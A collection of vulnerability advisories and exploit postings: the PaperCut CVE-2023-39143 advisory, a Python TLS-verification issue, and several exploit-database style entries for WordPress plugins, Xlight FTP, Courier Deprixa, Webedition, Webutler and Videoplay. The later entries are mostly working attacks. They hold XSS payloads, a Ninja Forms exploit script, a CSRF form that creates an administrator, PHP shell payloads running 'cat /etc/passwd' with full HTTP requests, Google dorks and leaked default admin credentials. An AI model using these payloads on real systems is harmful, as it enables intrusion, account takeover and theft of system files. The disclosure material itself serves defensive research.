PaperCut NG and PaperCut MF before 22.1.3 on Windows allow path traversal, enabling attackers to upload, read, or delete arbitrary files. This leads to remote code execution when external device integration is enabled (a very common configuration).

**Summary**

CVE-2023-39143 is a critical vulnerability we disclosed to PaperCut that affects the widely used PaperCut NG/MF print management software. It affects PaperCut NG/MF running on Windows, prior to version 22.1.3. If you are a user of PaperCut on Windows, and have it exposed to the Internet, we recommend you check out the July 2023 PaperCut security bulletin and immediately patch to the latest version if you haven’t already.

**Impact**

CVE-2023-39143 enables unauthenticated attackers to potentially read, delete, and upload arbitrary files to the PaperCut MF/NG application server, resulting in remote code execution in certain configurations.

In particular, the vulnerability affects PaperCut servers running on Windows. File upload leading to remote code execution is possible when the external device integration setting is enabled. This setting is on by default with certain installations of PaperCut, such as the PaperCut NG Commercial version or PaperCut MF.

Based on sample data we have collected at Horizon3 from real-world environments, we estimate that the vast majority of PaperCut installations are running on Windows with the external device integration setting turned on.

**Exploitability**

PaperCut has been on the radar of threat actors. Threat actors launched campaigns earlier this year targeting PaperCut servers vulnerable to CVE-2023-27350, a previously disclosed unauthenticated remote code execution vulnerability.

Compared to CVE-2023-27350, CVE-2023-39143 also does not require attackers to have any prior privileges to exploit, and no user interaction is required.

In contrast to CVE-2023-27350, CVE-2023-39143 is more complex to exploit, involving multiple issues that must be chained together to compromise a server. It is not a “one-shot” RCE vulnerability.

**Detection**

The following command checks if a PaperCut server is not patched and running on Windows.

curl -w "%{http\_code}" -k --path-as-is "https://<IP>:<port>/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"

A 200 response indicates the server has not been patched and is running on Windows. A 404 response indicates the server has been patched or not running on Windows.

 

We are not releasing further details at this time to provide users adequate time to upgrade.

**Remediation**

We recommend upgrading to the latest PaperCut NG/MF version, 22.1.3 as of this writing.

If upgrading is not possible, it is possible to mitigate this vulnerability by configuring an allowlist of device IP addresses that are permitted to communicate with the PaperCut server. Refer to the “IP Address Allow-listing” section of the PaperCut security best practices guide.

**Timeline**

*   May 30, 2023: Horizon3 sends initial disclosure to the PaperCut team
*   May 31, 2023: PaperCut acknowledges receipt of disclosure
*   June 5, 2023: Horizon3 updates disclosure to include impact of remote code execution
*   June 8, 2023: PaperCut confirms it is able to validate findings in disclosure
*   June/July 2023: Horizon3/PaperCut work together to test interim builds and coordinate disclosure
*   July 24, 2023: Horizon3 reserves CVE-2023-39143 with MITRE
*   July 25, 2023: PaperCut releases patch version 22.1.3
*   Aug. 4, 2023: This advisory

We’d like to extend our thanks to the PaperCut team for their prompt response and close collaboration to address this vulnerability.

**References**

CVE-2023-39143: CVE-2023-39143: PaperCut Path Traversal/File Upload RCE Vulnerability

Sydent is an identity server for the Matrix communications protocol. Prior to version 2.5.6, if configured to send emails using TLS, Sydent does not verify SMTP servers' certificates. This makes  Sydent's emails vulnerable to interception via a man-in-the-middle (MITM) attack. Attackers with privileged access to the network can intercept room invitations and address confirmation emails. This is patched in Sydent 2.5.6. When patching, make sure that Sydent trusts the certificate of the server it is connecting to. This should happen automatically when using properly issued certificates. Those who use self-signed certificates should make sure to copy their Certification Authority certificate, or their self signed certificate if using only one, to the trust store of your operating system. As a workaround, one can ensure Sydent's emails fail to send by setting the configured SMTP server to a loopback or non-routable address under one's control which does not have a listening SMTP server.

**Feature or enhancement**

I was surprised that Python does not verify hostnames by default for the stdlib modules for SMTP, IMAP, FTP, POP and NNTP. I believe the "insecure by default" behavior is no longer appropriate even for those protocol (at least SMTP and IMAP, I'm not too familiar with the rest - but even there, I suppose if an user asks for a secure connection, it should be secure).

In PEP 476 (_Enabling certificate verification by default for stdlib http clients_, 2014), certificate verification was enabled by default for HTTPS, with the rationale that:

> The failure to do these checks means that anyone with a privileged network position is able to trivially execute a man in the middle attack against a Python application using either of these HTTP clients, and change traffic at will.

and

> The “S” in “HTTPS” stands for secure. When Python’s users type “HTTPS” they are expecting a secure connection, and Python should adhere to a reasonable standard of care in delivering this. Currently we are failing at this, and in doing so, APIs which appear simple are misleading users.
> 
> When asked, many Python users state that they were not aware that Python failed to perform these validations, and are shocked.

and

> The failure of various applications to note Python’s negligence in this matter is a source of _regular_ CVE assignment

That PEP only improved that situation for HTTPS, stating that:

> This PEP only proposes requiring this level of validation for HTTP clients, not for other protocols such as SMTP.
> 
> This is because while a high percentage of HTTPS servers have correct certificates, as a result of the validation performed by browsers, for other protocols self-signed or otherwise incorrect certificates are far more common. Note that for SMTP at least, this appears to be changing and should be reviewed for a potential similar PEP in the future:
> 
> https://www.facebook.com/notes/protect-the-graph/the-current-state-of-smtp-starttls-deployment/1453015901605223  
> https://www.facebook.com/notes/protect-the-graph/massive-growth-in-smtp-starttls-deployment/1491049534468526

Unfortunately, it seems to be very difficult to find more recent data about how many SMTP/IMAP/... servers in the wild present an invalid certificate - all I could find is that according to Google, adoption of outgoing encryption _in general_ went up from ~75% when the PEP was written to ~90% now, and inbound encryption went up from ~57% to ~87%.

However, there seems to be a strong consensus to treat this kind of thing as a vulnerability in _clients_, even as early as 2007. Some examples:

*   CWE - CWE-297: Improper Validation of Certificate with Host Mismatch (4.6)
*   CVE - CVE-2007-5770: _The (1) Net::ftptls, (2) Net::telnets, (3) Net::imap, (4) Net::pop, and (5) Net::smtp libraries in Ruby 1.8.5 and 1.8.6 do not verify that the commonName (CN) field in a server certificate matches the domain name in a request sent over SSL, which makes it easier for remote attackers to intercept SSL transmissions via a man-in-the-middle attack or spoofed web site, different components than CVE-2007-5162._
*   NVD - CVE-2009-3766: _mutt\_ssl.c in mutt 1.5.16 and other versions before 1.5.19, when OpenSSL is used, does not verify the domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate._
*   CVE - CVE-2011-4318: _Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname._
*   CVE - CVE-2011-1429: _Mutt does not verify that the smtps server hostname matches the domain name of the subject of an X.509 certificate, which allows man-in-the-middle attackers to spoof an SSL SMTP server via an arbitrary certificate, a different vulnerability than CVE-2009-3766._
*   CVE - CVE-2012-2993: _Microsoft Windows Phone 7 does not verify the domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof an SSL server for the (1) POP3, (2) IMAP, or (3) SMTP protocol via an arbitrary valid certificate._
*   CVE - CVE-2013-0308: _The imap-send command in GIT before 1.8.1.4 does not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate._
*   CVE - CVE-2014-7273 / CVE - CVE-2014-7274: _The IMAP-over-SSL implementation in getmail 4.0.0 through 4.43.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof IMAP servers and obtain sensitive information via a crafted certificate._

and more recently:

*   CVE - CVE-2020-1758: _A flaw was found in Keycloak \[...\], where it does not perform the TLS hostname verification while sending emails using the SMTP server. \[...\]_
*   CVE - CVE-2020-9488: _Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. \[...\]_
*   CVE - CVE-2020-13163: _em-imap 0.5 uses the library eventmachine in an insecure way \[...\]. The hostname in a TLS server certificate is not verified._
*   NVD - CVE-2020-15047: _MSA/SMTP.cpp in Trojita \[...\] ignores certificate-verification errors, which allows man-in-the-middle attackers to spoof SMTP servers._
*   No enforcement of STARTTLS. OfflineIMAP/offlineimap#669
*   NVD - CVE-2021-44549: _Apache Sling Commons Messaging Mail provides a simple layer on top of JavaMail/Jakarta Mail for OSGi to send mails via SMTPS. To reduce the risk of "man in the middle" attacks additional server identity checks must be performed when accessing mail servers. For compatibility reasons these additional checks are disabled by default in JavaMail/Jakarta Mail. The SimpleMailService in Apache Sling Commons Messaging Mail 1.0 lacks an option to enable these checks for the shared mail session. A user could enable these checks nevertheless by accessing the session via the message created by SimpleMessageBuilder and setting the property mail.smtps.ssl.checkserveridentity to true. Apache Sling Commons Messaging Mail 2.0 adds support for enabling server identity checks and these checks are enabled by default._ (quoted in full as probably similar backwards compat concerns like in Python)

**Previous discussion**

*   PEP 476, see above
*   My Tweet, where @vstinner encouraged me to open an issue (and perhaps later PR) about this
*   SSL releated deprecation for 3.6 #72209 (2016), where @tiran proposed: _make ftplib, imaplib, nntplib, pop3lib, smtplib etc. validate certs by default._, but @vstinner objected (pointing to the concerns in PEP 476), and so did @ncoghlan. In August 2021, @kousu pointed out that this is still the case.

CVE-2023-38686: Enable TLS certificate validation by default for SMTP/IMAP/FTP/POP/NNTP protocols · Issue #91826 · python/cpython

WordPress Adivaha Travel plugin version 2.3 suffers from a cross site scripting vulnerability.

    # Exploit Title: WordPress adivaha Travel Plugin 2.3 - Reflected XSS# Exploit Author: CraCkEr# Date: 29/07/2023# Vendor: adivaha - Travel Tech Company# Vendor Homepage: https://www.adivaha.com/# Software Link: https://wordpress.org/plugins/adiaha-hotel/# Demo: https://www.adivaha.com/demo/adivaha-online/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /mobile-app/v3/GET parameter 'isMobile' is vulnerable to XSShttps://www.website/mobile-app/v3/?pid=77A89299&isMobile=[XSS]XSS Payload: clq95"><script>alert(1)</script>lb1ra[-] Done

WordPress Adivaha Travel 2.3 Cross Site Scripting

Xlight FTP Server version 3.9.3.6 suffers from a stack buffer overflow vulnerability.

    # Exploit Title: Xlight FTP Server 3.9.3.6 - 'Stack Buffer Overflow' (DOS)# Discovered by: Yehia Elghaly# Discovered Date: 2023-08-04# Vendor Homepage: https://www.xlightftpd.com/# Software Link : https://www.xlightftpd.com/download/setup.exe# Tested Version: 3.9.3.6# Vulnerability Type: Buffer Overflow Local# Tested on OS: Windows XP Professional SP3 - Windows 11 x64# Description: Xlight FTP Server 3.9.3.6 'Execute Program' Buffer Overflow (PoC)# Steps to reproduce:# 1. - Download and Xlight FTP Server# 2. - Run the python script and it will create exploit.txt file.# 3. - Open Xlight FTP Server 3.9.3.6# 4. - "File and Directory - Modify Virtual Server Configuration - Advanced - Misc- Setup # 6. - Execute a Program after use logged in-  Paste the characters # 7  - Crashed#!/usr/bin/env python3exploit = 'A' * 294try:     with open("exploit.txt","w") as file:        file.write(exploit)    print("POC is created")except:    print("POC not created")

Xlight FTP Server 3.9.3.6 Stack Buffer Overflow

WordPress Ninja Forms plugin version 3.6.25 suffers from a cross site scripting vulnerability.

# Exploit Title: WordPress Plugin Ninja Forms 3.6.25 - Reflected XSS (Authenticated)# Google Dork: inurl:/wp-content/plugins/ninja-forms/readme.txt# Date: 2023-07-27# Exploit Author: Mehran Seifalinia# Vendor Homepage: https://ninjaforms.com/# Software Link: https://downloads.wordpress.org/plugin/ninja-forms.3.6.25.zip# Version: 3.6.25# Tested on: Windows 10# CVE: CVE-2023-37979from requests import getfrom sys import argvfrom os import getcwdimport webbrowserfrom time import sleep# Values:url = argv[-1]if url[-1] == "/":    url = url.rstrip("/")# ConstantsCVE_NAME = "CVE-2023-37979"VULNERABLE_VERSION = "3.6.25"  # HTML templateHTML_TEMPLATE = f"""<!DOCTYPE html><html><head>  <title>{CVE_NAME}</title>  <style>    body {{      font-family: Arial, sans-serif;      background-color: #f7f7f7;      color: #333;      margin: 0;      padding: 0;    }}    header {{      background-color: #4CAF50;      padding: 10px;      text-align: center;      color: white;      font-size: 24px;    }}    .cool-button {{      background-color: #007bff;      color: white;      padding: 10px 20px;      border: none;      cursor: pointer;      font-size: 16px;      border-radius: 4px;    }}    .cool-button:hover {{      background-color: #0056b3;    }}  </style></head><body>  <header>  Ninja-forms reflected XSS ({CVE_NAME})</br>    Created by Mehran Seifalinia  </header>  <div style="padding: 20px;">    <form action="{url}/wp-admin/admin-ajax.php" method="POST">      <input type="hidden" name="action" value="nf_batch_process" />      <input type="hidden" name="batch_type" value="import_form_template" />      <input type="hidden" name="security" value="e29f2d8dca" />      <input type="hidden" name="extraData[template]" value="formtemplate-contactformd" />      <input type="hidden" name="method_override" value="_respond" />      <input type="hidden" name="data" value="Mehran"}}<img src=Seifalinia onerror=alert(String.fromCharCode(78,105,110,106,97,45,102,111,114,109,115,32,114,101,102,108,101,99,116,101,100,32,88,83,83,10,67,86,69,45,50,48,50,51,45,51,55,57,55,57,10,45,77,101,104,114,97,110,32,83,101,105,102,97,108,105,110,105,97,45))>" />      <input type="submit" class="cool-button" value="Click here to Execute XSS" />    </form>  </div>  <div style="background-color:red;color:white;padding:1%;">After click on the button, If you received a 0 or received an empty page in browser , that means you need to login first.</div>  <footer>  <a href="https://github.com/Mehran-Seifalinia">Github</a>  </br>  <a href="https://www.linkedin.com/in/mehran-seifalinia-63577a1b6/?originalSubdomain=ir">LinkedIn</a  </footer></body></html>"""def exploit():    with open(f"{CVE_NAME}.html", "w") as poc:        poc.write(HTML_TEMPLATE)        print(f"[@] POC Generated at {getcwd()}\{CVE_NAME}.html")        print("^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^")        sleep(2)        webbrowser.open(f"{getcwd()}\{CVE_NAME}.html")# Check if the vulnerable version is installeddef check_CVE():    try:        response = get(url + "/wp-content/plugins/ninja-forms/readme.txt")        if response.status_code != 200 or not("Ninja Forms" in response.text):            print("[!] Ninja-forms plugin has not installed on this site.")            return False        else:            version = response.text.split("Stable tag:")[1].split("License")[0].split()[0]            main_version = int(version.split(".")[0])            partial_version = int(version.split(".")[1])            final_version = int(version.split(".")[2])            if (main_version < 3) or (main_version == 3 and partial_version < 6) or (main_version == 3 and partial_version == 6 and final_version <= 25):                print(f"[*] Vulnerable Nonja-forms version {version} detected!")                return True            else:                print(f"[!] Nonja-forms version {version} is not vulnerable!")                return False    except Exception as error:        print(f"[!] Error: {error}")        exit()# Check syntax of the scriptdef check_script():    usage = f"""Usage: {argv[0].split("/")[-1].split("/")[-1]} [OPTIONS] [TARGET]    OPTIONS:        --exploit:  Open a browser and execute the vulnerability.    TARGET:        An URL starts with 'http://' or 'https://'Examples:    > {argv[0].split("/")[-1]} https://vulnsite.com    > {argv[0].split("/")[-1]} --exploit https://vulnsite.com"""    try:        if len(argv) < 2 or len(argv) > 3:            print("[!] Syntax error...")            print(usage)            exit()        elif not url.startswith(tuple(["http://", "https://"])):            print("[!] Invalid target...\n\tTarget most starts with 'http://' or 'https://'")            exit()        else:            for arg in argv:                if arg == argv[0]:                    print("[*]Starting the script >>>")                    state = check_CVE()                    if state == False:                        exit()                elif arg.lower() == "--exploit":                    exploit()                elif arg == url:                    continue                else:                    print(f"[!] What the heck is '{arg}' in the command?")    except Exception as error:        print(f"[!] Error: {error}")        exit()if __name__ == "__main__":    check_script()

WordPress Ninja Forms 3.6.25 Cross Site Scripting

COURIER DEPRIXA version 2.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================| # Title     : COURIER DEPRIXA V2.5 CSRF Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 5.[+] Set the target site link Save changes and apply . [+] infected file : /deprixa/settings/addusersadmin/agregar.php[+] save code as poc.html [+]  <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i> New Administrator</h4>                          </div>                          <div class="modal-body">                                                      <form action="https://127.0.0.1/galaxyexpressuaecom/deprixa/settings/addusersadmin/agregar.php"  class="form-horizontal" method="post">                              <div class="form-group " id="gnombrepa">                              <label for="off_name" class="col-sm-2 control-label">Name</label>                              <div class="col-sm-10">                                <input type="text" class="form-control off_name" name="name_parson"  placeholder="Name Administrator ">                              </div>                              </div>                              <div class="form-group" id="gapellido">                              <label for="email" class="col-sm-2 control-label">Email </label>                              <div class="col-sm-5">                                <input type="text" class="form-control email" name="email"   placeholder="Email ">                              </div>                              <div class="col-sm-5">                                <input class="form-control phone" name="phone" placeholder="Phone">                                                                    </div>                              </div>                              <div class="form-group" id="gemail">                              <label for="office" class="col-sm-2 control-label">Office</label>                              <div class="col-sm-5">                                <input type="text" class="form-control office" name="office"  placeholder="Office ">                              </div>                              <div class="col-sm-5">                              <select type="text" class="form-control role" name="role" >                                <option value="Administrator">Administrator</option>                                                    </select>                              </div>                              </div>                              <div class="form-group " id="gnombre">                              <label for="off_name" class="col-sm-2 control-label">User</label>                              <div class="col-sm-10">                                <input type="text" class="form-control off_name" name="name"  placeholder="User">                              </div>                              </div>                              <div class="form-group" id="gpassword">                              <label for="pwd" class="col-sm-2 control-label">Password</label>                              <div class="col-sm-10">                                <input type="text" class="form-control pwd" name="pwd"  placeholder="Password">                              </div>                              </div>                              <div class="form-group">                              <div class="col-sm-offset-2 col-sm-10">                                <div class="checkbox checkbox-success">                                  <input id="checkbox3" type="checkbox" name="estado" value="1" checked>                                  <label for="checkbox3">                                    Status                                  </label>                                </div>                                <div class="checkbox checkbox-inline" >                                  <input type="checkbox"  name="type" value="a" onclick="return false" checked>                                  <label for="inlineCheckbox3"> Type of user </label>                                </div>                              </div>                              </div>                                                          </div>                            <div class="modal-footer">                              <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>                                Close</button>                              <input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">                            </div>                          </form>                                                      </div>                        </div>                      </div>                      <!--fin de moGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

COURIER DEPRIXA 2.5 Cross Site Request Forgery

Webedition CMS version 2.9.8.8 suffers from a persistent cross site scripting vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Stored XSSApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Stored XssTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login to account2. Go to New ->  Media -> Image3. Upload malicious svg file svg file content:"""<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>   <script type="text/javascript">      alert(document.location);   </script></svg>"""Poc request:POST /webEdition/we_cmd.php?we_cmd[0]=save_document&we_cmd[1]=&we_cmd[2]=&we_cmd[3]=&we_cmd[4]=&we_cmd[5]=&we_cmd[6]= HTTP/1.1Host: localhostContent-Length: 761Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=73fee01822cc1e1b9ae2d7974583bb8eAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=73fee01822cc1e1b9ae2d7974583bb8e&we_cea6f7e60ce62be78e59f849855d2038_Filename=malas&we_cea6f7e60ce62be78e59f849855d2038_Extension=.svg&wetmp_we_cea6f7e60ce62be78e59f849855d2038_Extension=&we_cea6f7e60ce62be78e59f849855d2038_ParentPath=%2F&we_cea6f7e60ce62be78e59f849855d2038_ParentID=0&yuiAcContentTypeParentPath=&we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&check_we_cea6f7e60ce62be78e59f849855d2038_IsSearchable=1&we_cea6f7e60ce62be78e59f849855d2038_IsProtected=0&fold%5B0%5D=0&fold_named%5BPropertyPage_2%5D=0&fold%5B1%5D=0&fold_named%5BPropertyPage_3%5D=0&wetmp_cea6f7e60ce62be78e59f849855d2038_CreatorID=%2Fadmin&we_cea6f7e60ce62be78e59f849855d2038_CreatorID=1&we_cea6f7e60ce62be78e59f849855d2038_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Cross Site Scripting

Webedition CMS version 2.9.8.8 suffers from a remote code execution vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Remote Code Execution (RCE)Application: webedition CmsVersion: v2.9.8.8   Bugs:  RCETechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1. Login account2. Go to New -> Webedition page -> empty page3. Select php4. Set as "><?php echo system("cat /etc/passwd");?>  Description areaPoc request: POST /webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0dd HTTP/1.1Host: localhostContent-Length: 1621Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: iframeReferer: http://localhost/webEdition/we_cmd.php?we_cmd[0]=switch_edit_page&we_cmd[1]=0&we_cmd[2]=4fd880c06df5a590754ce5b8738cd0ddAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=e781790f1d79ddaf9e3a0a4eb42e55b04496a569; cookie=yep; treewidth_main=300Connection: closewe_transaction=4fd880c06df5a590754ce5b8738cd0dd&we_003be033b474a5c25132d388906fb4ae_Filename=poc&we_003be033b474a5c25132d388906fb4ae_Extension=.php&wetmp_we_003be033b474a5c25132d388906fb4ae_Extension=&we_003be033b474a5c25132d388906fb4ae_ParentPath=%2F&we_003be033b474a5c25132d388906fb4ae_ParentID=0&yuiAcContentTypeParentPath=&we_003be033b474a5c25132d388906fb4ae_DocType=&we_003be033b474a5c25132d388906fb4ae_TemplateName=%2F&we_003be033b474a5c25132d388906fb4ae_TemplateID=&yuiAcContentTypeTemplate=&we_003be033b474a5c25132d388906fb4ae_IsDynamic=0&we_003be033b474a5c25132d388906fb4ae_IsSearchable=0&we_003be033b474a5c25132d388906fb4ae_InGlossar=0&we_003be033b474a5c25132d388906fb4ae_txt%5BTitle%5D=asdf&we_003be033b474a5c25132d388906fb4ae_txt%5BDescription%5D=%22%3E%3C%3Fphp+echo+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E&we_003be033b474a5c25132d388906fb4ae_txt%5BKeywords%5D=asdf&fold%5B0%5D=0&fold_named%5BPropertyPage_3%5D=0&we_003be033b474a5c25132d388906fb4ae_Language=en_GB&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Bde_DE%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Bde_DE%5D=&yuiAcContentTypeLanguageDocdeDE=&we_003be033b474a5c25132d388906fb4ae_LanguageDocName%5Ben_GB%5D=&we_003be033b474a5c25132d388906fb4ae_LanguageDocID%5Ben_GB%5D=&yuiAcContentTypeLanguageDocenGB=&fold%5B1%5D=0&fold_named%5BPropertyPage_4%5D=0&we_003be033b474a5c25132d388906fb4ae_CopyID=0&fold%5B2%5D=0&fold_named%5BPropertyPage_6%5D=0&wetmp_003be033b474a5c25132d388906fb4ae_CreatorID=%2Fadmin&we_003be033b474a5c25132d388906fb4ae_CreatorID=1&we_003be033b474a5c25132d388906fb4ae_RestrictOwners=0&we_complete_request=1

Webedition CMS 2.9.8.8 Remote Code Execution

Webutler version 3.2 suffers from a remote shell upload vulnerability.

    Exploit Title: Webutler v3.2 - Remote Code Execution (RCE)Application: webutler CmsVersion: v3.2Bugs:  RCETechnology: PHPVendor URL: https://webutler.de/enSoftware Link: http://webutler.de/download/webutler_v3.2.zipDate of found: 03.08.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps: 1. login to account as admin2. go to visit media 3.upload phar file4. upload poc.phar filepoc.phar file contents :<?php echo system("cat /etc/passwd");?>5. Visit to poc.phar filepoc request:POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1Host: localhostContent-Length: 40sec-ch-ua: sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36X_FILENAME: poc.pharsec-ch-ua-platform: ""Accept: */*Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webutler_v3.2/admin/browser/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropoluConnection: close<?php echo system("cat /etc/passwd");?>

Webutler 3.2 Shell Upload

Videoplay version 1.3.0 appears to leave default credentials installed after installation.

    ======================================================================================================================================| # Title     : Videoplay V1.3.0 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                               || # Vendor    : https://codecanyon.net/                                                                                              |  | # Dork      : VideoPlay - The best video subscription platform                                                                     |======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Use Admin : admin@coffeetheme.com & Pass : password[+] https://videoswebguyzdashboardcom/dashboard/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Tag

#windows